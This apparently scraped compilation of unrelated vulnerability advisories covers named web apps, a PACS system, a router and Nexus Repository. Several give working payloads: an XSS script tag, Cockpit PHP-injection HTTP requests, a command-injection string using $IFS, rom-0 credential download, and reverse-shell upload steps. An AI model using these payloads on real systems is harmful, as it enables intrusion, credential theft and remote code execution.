When a user clicks on the 'add new record' button, they can enter malicious JavaScript code into the parameters. When the record is added, the malicious code will be stored in the database and will be executed when the page is refreshed.
Log into the application, click on pass then click add a pass, put <script>alert(1)</script> in the Full name parameter, rest all fill whatever you want, then go to manage passes, view the pass you just created and you'll get popup of alert(1)
Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06. Exploit Login: POST /auth/check HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 52 Origin: https://example.com {"auth":{"user":"test'.phpinfo().'","password":"b"}} Exploit Password reset: POST /auth/requestreset HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 28 Origin: https://example.com {"user":"test'.phpinfo().'"}
An unrestricted file upload vulnerability in Employee Record System 1.0 allows an attacker to upload a malicious file, such as a webshell, to the server. This can be exploited to execute arbitrary code on the server, leading to remote code execution. The vulnerability exists in the 'Add Employee' page, where an attacker can upload a malicious file in the 'Upload Employee Photo' and 'Upload Employee ID' fields. The malicious file is then accessible via a direct URL, allowing an attacker to execute arbitrary code on the server.
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter 'file' on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access. Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/.
The iBall-Baton router version WRA150N is vulnerable to the Rom-0 exploit. The rom-0 is a file which contains the ADSL Login credentials. In the case of this router the access to this file is unusually not encrypted. The file can be accessed by typing the WiFi IP address in the browser followed by /rom-0 (For example - 192.168.1.1/rom-0). The rom-0 file will be downloaded. The file is obfuscated, however. It needs to be deobfuscated using online decryptors or by using threat 9's routersploit and using router/multi/rom-0 module.
Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable to Java EL injection which allows a low privilege user to remotely execute code on the target server.
user can manipulate parameter “UserIndex” in personal setting page. this parameter can allow un-authorized access to view or change other user's personal information.
A stored cross-site scripting vulnerability exists in the Responsive E-Learning System 1.0, which allows an attacker to inject malicious JavaScript code into the application. By exploiting this vulnerability, an attacker can gain access to the application and execute malicious code on the victim's browser.
An attacker can exploit the unrestricted file upload vulnerability in the Responsive E-Learning System 1.0 to gain remote code execution. The attacker can login to the application with admin credentials, click on Student or go to http://localhost/elearning/admin/student.php, click on Add Student and fill the required things. In image upload any php reverse shell. Then, the attacker can visit http://localhost/elearning/admin/uploads/ and select the uploaded PHP web shell.
Services By CQR